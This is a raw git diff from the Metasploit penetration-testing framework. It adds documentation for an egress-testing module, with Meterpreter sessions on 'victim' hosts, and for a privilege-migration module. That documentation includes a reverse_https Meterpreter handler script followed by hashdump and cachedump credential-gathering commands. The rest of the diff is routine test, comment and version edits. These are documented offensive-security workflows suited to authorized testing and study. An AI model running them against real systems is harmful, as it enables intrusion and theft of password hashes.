NATIVE mode uses Rex sockets to generate traffic.
|
||||
WINAPI mode uses Winsock APIs to generate traffic.
|
||||
|
||||
As it currently stands, the user will need to set up a listener/tcpdump/wireshark to determine the ports that are open. My [egresscheck-framework](https://github.com/stufus/egresscheck-framework ) code can help with that, but any listener would be fine.
|
||||
|
||||
# Example - Windows Meterpreter
|
||||
|
||||
Scenario is:
|
||||
|
||||
* The victim host is 192.0.2.104
|
||||
* The attacker is 192.0.2.1
|
||||
* The attacker wishes to generate TCP packets to 192.0.2.1 (with meterpreter on 192.0.2.104) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1.
|
||||
* The compromised machine is a Windows 8.1 machine
|
||||
|
||||
```
|
||||
msf> sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
2 meterpreter x86/win32 TESTER\Stuart @ TESTER 192.0.2.1:9877 -> 192.0.2.104:43595 (192.0.2.104)
|
||||
|
||||
msf> set METHOD NATIVE
|
||||
METHOD => NATIVE
|
||||
msf> set PORTS 22,23,53,80,88,443,445
|
||||
PORTS => 22,23,53,80,88,443,445
|
||||
msf> set PROTOCOL TCP
|
||||
PROTOCOL => TCP
|
||||
msf> set SESSION 2
|
||||
SESSION => 2
|
||||
msf> set TARGET 192.0.2.1
|
||||
TARGET => 192.0.2.1
|
||||
msf> set THREADS 3
|
||||
THREADS => 3
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL TCP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 2 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf> run
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> set VERBOSE TRUE
|
||||
VERBOSE => TRUE
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
Here is an example with the METHOD parameter set to WINAPI:
|
||||
|
||||
```
|
||||
msf> set METHOD WINAPI
|
||||
METHOD => WINAPI
|
||||
msf> run
|
||||
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/53 (Handle: 14908)
|
||||
[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/23 (Handle: 14856)
|
||||
[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/53
|
||||
[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/23
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/22 (Handle: 14300)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/22
|
||||
[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 53) Error: 10061
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 22) Error: 10061
|
||||
[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 23) Error: 10061
|
||||
[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/88 (Handle: 13868)
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/80 (Handle: 14300)
|
||||
[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/88
|
||||
[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/443 (Handle: 14908)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/80
|
||||
[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/443
|
||||
[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 88) Error: 10061
|
||||
[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 443) Error: 10061
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 80) Error: 10061
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/445 (Handle: 13868)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/445
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 445) Error: 10061
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
UDP also works correctly:
|
||||
|
||||
```
|
||||
msf> set PROTOCOL UDP
|
||||
PROTOCOL => UDP
|
||||
msf> set METHOD NATIVE
|
||||
METHOD => NATIVE
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 2 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf> run
|
||||
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating UDP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445
|
||||
[*] UDP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
Note that the errors showing in verbose mode are normal; this is because there is nothing actually listening on any of those ports, meaning that the calls will fail.
|
||||
|
||||
Running tcpdump on 192.0.2.1 showed all the connection attempts as normal.
|
||||
|
||||
# Example - Linux Meterpreter
|
||||
|
||||
Scenario is:
|
||||
|
||||
* The victim host is 192.0.2.103
|
||||
* The attacker is 192.0.2.1
|
||||
* The attacker wishes to generate TCP packets to 192.0.2.1 (with linux meterpreter on 192.0.2.103) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1.
|
||||
* The compromised machine is a Linux machine (running Kali)
|
||||
|
||||
```
|
||||
msf> sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
4 meterpreter x86/linux uid=1000, gid=1001, euid=1000, egid=1001, suid=1000, sgid=1001 @ kali 192.0.2.1:4322 -> 192.0.2.103:37489 (192.0.2.103)
|
||||
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> set PROTOCOL UDP
|
||||
PROTOCOL => UDP
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating UDP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445
|
||||
[*] UDP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 4 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf>
|
||||
```
|
||||
|
||||
![msfegress_tcpdump_udp](https://cloud.githubusercontent.com/assets/12296344/11459958/a7862f22-96da-11e5-86a2-31a4c0153944.png)
|
||||
|
||||
# Future Work
|
||||
|
||||
This module did not appear to work on python meterpreter.
|
|
@ -0,0 +1,67 @@
|
|||
## Overview
|
||||
This module evaluates a Windows Meterpreter session's privileges and migrates the session accordingly. The purpose of this module is to enable the scripting of migrations post exploitation, which allows you to immediately run post modules that require system rights.
|
||||
|
||||
You can use this module in situations where incoming sessions may have mixed rights levels and the session needs to be migrated appropriately for additional post modules to run. It is also useful in situations where migration needs to occur within a short period after the session is created.
|
||||
|
||||
The types of migrations that occur are described below:
|
||||
|
||||
- A session with admin rights is migrated to a system owned process.
|
||||
- A session with user rights is migrated to a user level process. If a specified user level process is not running, the module will spawn it and then migrate the session.
|
||||
|
||||
This module is a nice addition to the beginning of an autorun script for post-Meterpreter session creation. An example of an autorun script is provided below.
|
||||
|
||||
## Module Options
|
||||
- **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights.
|
||||
- **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes.
|
||||
- **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE.
|
||||
|
||||
## Module Process
|
||||
Here is the process that the module follows:
|
||||
|
||||
- Retrieves the privilege information for the current session.
|
||||
- If the session has admin rights, it attempts to migrate to a system owned process in the following order:
|
||||
- ANAME (Module option, if specified)
|
||||
- services.exe
|
||||
- winlogon.exe
|
||||
- wininit.exe
|
||||
- lsm.exe
|
||||
- lsass.exe
|
||||
- If it is unable to migrate to one of these processes, it drops to user level migration.
|
||||
- If the session has user rights, it attempts to migrate to a user owned process in the following order:
|
||||
- NAME (Module option, if specified)
|
||||
- explorer.exe
|
||||
- notepad.exe
|
||||
- If it cannot migrate, it attempts to spawn the process and migrates to the newly spawned process.
|
||||
|
||||
## Using This Module with AutoRun Scripts
|
||||
The use of autorun scripts with this module is an easy way to automate post-exploitation for incoming Meterpreter sessions. The following section describes the basic setup information and provides a script example to show how this module comes in handy.
|
||||
|
||||
### Basic Setup Information
|
||||
Resource file (.rc) scripts can be used to automate many processes in Metasploit, particularly starting up the console and running scripts once a session is created.
|
||||
|
||||
Startup scripts are executed using the following example where startup.rc is the startup script, and it is located in the user's home directory. Startup scripts are executed once the Metasploit Framework is loaded.
|
||||
|
||||
```
|
||||
./msfconsole -r /home/user/startup.rc
|
||||
```
|
||||
|
||||
The following is an example startup script that fires up a Meterpreter listener and specifies an autorun script that will be executed when a new session is created. In this example auto.rc is the script to be run after session creation.
|
||||
|
||||
```
|
||||
use exploit/multi/handler
|
||||
set PAYLOAD windows/meterpreter/reverse_https
|
||||
set LHOST 192.168.1.101
|
||||
set LPORT 13002
|
||||
set ExitOnSession false
|
||||
set AutoRunScript multi_console_command -rc /home/user/auto.rc
|
||||
exploit -j
|
||||
```
|
||||
|
||||
### AutoRun Script Example
|
||||
This example is a script that will use priv_migrate to migrate the session based on session rights. After migration, it executes modules that will retrieve user password hashes and cached domain hashes. Each one of the hash dump modules requires system rights to be successful. Priv_migrate makes it possible to execute these modules in an autorun script. For sessions with user rights, the hash dump modules will fail, but that is unlikely to impact the state of the session.
|
||||
|
||||
```
|
||||
run post/windows/manage/priv_migrate
|
||||
run post/windows/gather/hashdump
|
||||
run post/windows/gather/cachedump
|
||||
```
|
|
@ -48,7 +48,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
Then the output should contain "command_line_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
|
||||
|
@ -82,7 +82,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "environment_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
|
||||
|
@ -109,7 +109,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "user_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
|
||||
|
@ -127,7 +127,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "project_metasploit_framework_test"
|
||||
|
||||
|
||||
|
@ -140,7 +140,7 @@ Feature: `msfconsole` `database.yml`
|
|||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" does not exist
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should not contain "command_line_metasploit_framework_test"
|
||||
And the output should not contain "environment_metasploit_framework_test"
|
||||
And the output should not contain "user_metasploit_framework_test"
|
||||
|
@ -148,6 +148,6 @@ Feature: `msfconsole` `database.yml`
|
|||
And the output should contain "[*] postgresql selected, no connection"
|
||||
|
||||
Scenario: Starting `msfconsole` with a valid database.yml
|
||||
When I run `msfconsole --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "[*] postgresql connected to metasploit_framework_test"
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@ end
|
|||
|
||||
Given /^the project "database.yml" exists with:$/ do |file_content|
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
write_file(Metasploit::Framework::Database::Cucumber.project_configurations_path, file_content)
|
||||
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
|
||||
end
|
||||
|
||||
After do
|
||||
|
|
|
@ -5,30 +5,30 @@ Before do
|
|||
end
|
||||
|
||||
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
|
||||
unless Bundler.settings.without.include?(:coverage)
|
||||
Before do |scenario|
|
||||
command_name = case scenario
|
||||
when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
"#{scenario.feature.title} #{scenario.name}"
|
||||
when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
scenario_outline = scenario.scenario_outline
|
||||
|
||||
"#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
else
|
||||
raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
end
|
||||
|
||||
# Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# of overwriting each other as 'Cucumber Features'
|
||||
set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
|
||||
simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
end
|
||||
|
||||
Before('@db') do |scenario|
|
||||
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
end
|
||||
end
|
||||
# unless Bundler.settings.without.include?(:coverage)
|
||||
# Before do |scenario|
|
||||
# command_name = case scenario
|
||||
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
# "#{scenario.feature.title} #{scenario.name}"
|
||||
# when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
# scenario_outline = scenario.scenario_outline
|
||||
#
|
||||
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
# else
|
||||
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
# end
|
||||
#
|
||||
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# # of overwriting each other as 'Cucumber Features'
|
||||
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
#
|
||||
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
# end
|
||||
#
|
||||
# Before('@db') do |scenario|
|
||||
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
# ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
# end
|
||||
# end
|
||||
|
|
|
@ -9,7 +9,7 @@ module Anemone
|
|||
def_delegators :@keys, :has_key?, :keys, :size
|
||||
|
||||
def initialize(file)
|
||||
File.delete(file) if File.exists?(file)
|
||||
File.delete(file) if File.exist?(file)
|
||||
@store = ::PStore.new(file)
|
||||
@keys = {}
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module Metasploit
|
|||
|
||||
# This class is responsible for taking datastore options from the snmp_login module
|
||||
# and yielding appropriate {Metasploit::Framework::Credential}s to the {Metasploit::Framework::LoginScanner::SNMP}.
|
||||
# This one has to be different from {credentialCollection} as it will only have a {Metasploit::Framework::Credential#public}
|
||||
# This one has to be different from credentialCollection as it will only have a {Metasploit::Framework::Credential#public}
|
||||
# It may be slightly confusing that the attribues are called password and pass_file, because this is what the legacy
|
||||
# module used. However, community Strings are now considered more to be public credentials than private ones.
|
||||
class CommunityStringCollection
|
||||
|
|
|
@ -18,10 +18,10 @@ module Metasploit
|
|||
# Module Methods
|
||||
#
|
||||
|
||||
# Returns first configuration pathname from {configuration_pathnames} or the overridding `:path`.
|
||||
# Returns first configuration pathname from configuration_pathnames or the overridding `:path`.
|
||||
#
|
||||
# @param options [Hash{Symbol=>String}]
|
||||
# @option options [String] :path Path to use instead of first element of {configurations_pathnames}
|
||||
# @option options [String] :path Path to use instead of first element of configurations_pathnames
|
||||
# @return [Pathname] if configuration pathname exists.
|
||||
# @return [nil] if configuration pathname does not exist.
|
||||
def self.configurations_pathname(options={})
|
||||
|
|
|
@ -29,7 +29,7 @@ module Metasploit
|
|||
|
||||
# Returns the latest sid from MSP
|
||||
#
|
||||
# @param [Rex::Proto::Http::Response]
|
||||
# @param res [Rex::Proto::Http::Response]
|
||||
# @return [String] The session ID for MSP
|
||||
def get_sid(res)
|
||||
cookies = res.get_cookies
|
||||
|
@ -41,7 +41,7 @@ module Metasploit
|
|||
|
||||
# Returns the hidden inputs
|
||||
#
|
||||
# @param [Rex::Proto::Http::Response]
|
||||
# @param res [Rex::Proto::Http::Response]
|
||||
# @return [Hash] Input fields
|
||||
def get_hidden_inputs(res)
|
||||
found_inputs = {}
|
||||
|
|
|
@ -60,7 +60,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
# Attempt to login with every {Credential credential} in # {#cred_details}.
|
||||
# Attempt to login with every {Credential credential} in # #cred_details.
|
||||
#
|
||||
# @yieldparam result [Result] The {Result} object for each attempt
|
||||
# @yieldreturn [void]
|
||||
|
|
|
@ -5,7 +5,7 @@ module Metasploit
|
|||
module RailsVersionConstraint
|
||||
|
||||
# The Metasploit ecosystem is not yet ready for Rails 4.1:
|
||||
RAILS_VERSION = [ '>= 4.0.9', '< 4.1.0' ]
|
||||
RAILS_VERSION = '~> 4.2.6'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -42,7 +42,7 @@ module Metasploit::Framework::Spec::Constants
|
|||
# Adds actions to `spec` task so that `rake spec` fails if any of the following:
|
||||
#
|
||||
# # `log/leaked-constants.log` exists after printing out the leaked constants.
|
||||
# # {Each.configured!} is unnecessary in `spec/spec_helper.rb` and should be removed.
|
||||
# # Each.configured! is unnecessary in `spec/spec_helper.rb` and should be removed.
|
||||
#
|
||||
# @return [void]
|
||||
def self.define_task
|
||||
|
@ -96,4 +96,4 @@ module Metasploit::Framework::Spec::Constants
|
|||
|
||||
full_name
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -19,7 +19,7 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
attr_accessor :leaks_cleaned
|
||||
end
|
||||
|
||||
# Is {Metasploit::Framework::Spec::Constants::Each.configure!} still necessary or should it be removed?
|
||||
# Is Metasploit::Framework::Spec::Constants::Each.configure! still necessary or should it be removed?
|
||||
#
|
||||
# @return [true] if {configure!}'s `before(:each)` cleaned up leaked constants
|
||||
# @return [false] otherwise
|
||||
|
@ -91,7 +91,7 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
!!@configured
|
||||
end
|
||||
|
||||
# Adds action to `spec` task so that `rake spec` fails if {configured!} is unnecessary in `spec/spec_helper.rb` and
|
||||
# Adds action to `spec` task so that `rake spec` fails if configured! is unnecessary in `spec/spec_helper.rb` and
|
||||
# should be removed
|
||||
#
|
||||
# @return [void]
|
||||
|
@ -116,4 +116,4 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,7 +6,7 @@ module Metasploit::Framework::Spec::Constants::Suite
|
|||
|
||||
LOGS_PATHNAME = Pathname.new('log/metasploit/framework/spec/constants/suite')
|
||||
|
||||
# Logs leaked constants to {LOG_PATHNAME} and prints `message` to stderr.
|
||||
# Logs leaked constants to LOG_PATHNAME and prints `message` to stderr.
|
||||
#
|
||||
# @param hook (see log_pathname)
|
||||
# @param message [String] additional message printed to stderr when there is at least one leaked constant.
|
||||
|
@ -116,4 +116,4 @@ module Metasploit::Framework::Spec::Constants::Suite
|
|||
|
||||
leaks
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# Wraps {Msf::Framework} so that {Msf::Framework#threads} is only created on the first call to {#spawn} by
|
||||
# {Rex::ThreadFactory#spawn}, which allows the threads used by {Msf::ThreadManager} to be created lazily.
|
||||
# Rex::ThreadFactory#spawn, which allows the threads used by {Msf::ThreadManager} to be created lazily.
|
||||
#
|
||||
# @example Setting Rex::ThreadFactory.provider and spawning threads
|
||||
# Rex::ThreadFactory.provider = Metasploit::Framework::ThreadFactoryProvider.new(framework: framework)
|
||||
|
@ -23,4 +23,4 @@ class Metasploit::Framework::ThreadFactoryProvider < Metasploit::Model::Base
|
|||
def spawn(name, critical, *args, &block)
|
||||
framework.threads.spawn(name, critical, *args, &block)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.11.22"
|
||||
VERSION = "4.12.7"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -471,7 +471,7 @@ class ReadableText
|
|||
def self.dump_references(mod, indent = '')
|
||||
output = ''
|
||||
|
||||
if (mod.respond_to? :references and mod.references and mod.references.length > 0)
|
||||
if (mod.respond_to?(:references) && mod.references && mod.references.length > 0)
|
||||
output << "References:\n"
|
||||
mod.references.each { |ref|
|
||||
output << indent + ref.to_s + "\n"
|
||||
|
@ -510,19 +510,14 @@ class ReadableText
|
|||
#
|
||||
# @param framework [Msf::Framework] the framework to dump.
|
||||
# @param opts [Hash] the options to dump with.
|
||||
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||
# effect).
|
||||
# @option opts :verbose [Boolean] gives more information if set to
|
||||
# true.
|
||||
# @option opts :indent [Integer] set the indentation amount.
|
||||
# @option opts :col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of sessions.
|
||||
def self.dump_sessions(framework, opts={})
|
||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||
verbose = opts[:verbose] || false
|
||||
show_extended = opts[:show_extended] || false
|
||||
indent = opts[:indent] || DefaultIndent
|
||||
col = opts[:col] || DefaultColumnWrap
|
||||
|
||||
return dump_sessions_verbose(framework, opts) if verbose
|
||||
|
||||
|
@ -530,6 +525,7 @@ class ReadableText
|
|||
columns << 'Id'
|
||||
columns << 'Type'
|
||||
columns << 'Checkin?' if show_extended
|
||||
columns << 'Local URI' if show_extended
|
||||
columns << 'Information'
|
||||
columns << 'Connection'
|
||||
|
||||
|
@ -558,6 +554,12 @@ class ReadableText
|
|||
else
|
||||
row << '?'
|
||||
end
|
||||
|
||||
if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty?
|
||||
row << " (#{session.exploit_datastore['LURI']})"
|
||||
else
|
||||
row << '?'
|
||||
end
|
||||
end
|
||||
|
||||
row << sinfo
|
||||
|
@ -573,12 +575,8 @@ class ReadableText
|
|||
#
|
||||
# @param framework [Msf::Framework] the framework to dump.
|
||||
# @param opts [Hash] the options to dump with.
|
||||
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||
# effect).
|
||||
# @return [String] the formatted list of sessions.
|
||||
def self.dump_sessions_verbose(framework, opts={})
|
||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||
|
||||
out = "Active sessions\n" +
|
||||
"===============\n\n"
|
||||
|
||||
|
@ -597,6 +595,7 @@ class ReadableText
|
|||
sess_type = session.type.to_s
|
||||
sess_uuid = session.payload_uuid.to_s
|
||||
sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
|
||||
sess_luri = session.exploit_datastore['LURI'] || ""
|
||||
|
||||
sess_checkin = "<none>"
|
||||
sess_machine_id = session.machine_id.to_s
|
||||
|
@ -626,6 +625,9 @@ class ReadableText
|
|||
out << " MachineID: #{sess_machine_id}\n"
|
||||
out << " CheckIn: #{sess_checkin}\n"
|
||||
out << " Registered: #{sess_registration}\n"
|
||||
if !sess_luri.empty?
|
||||
out << " LURI: #{sess_luri}\n"
|
||||
end
|
||||
|
||||
|
||||
|
||||
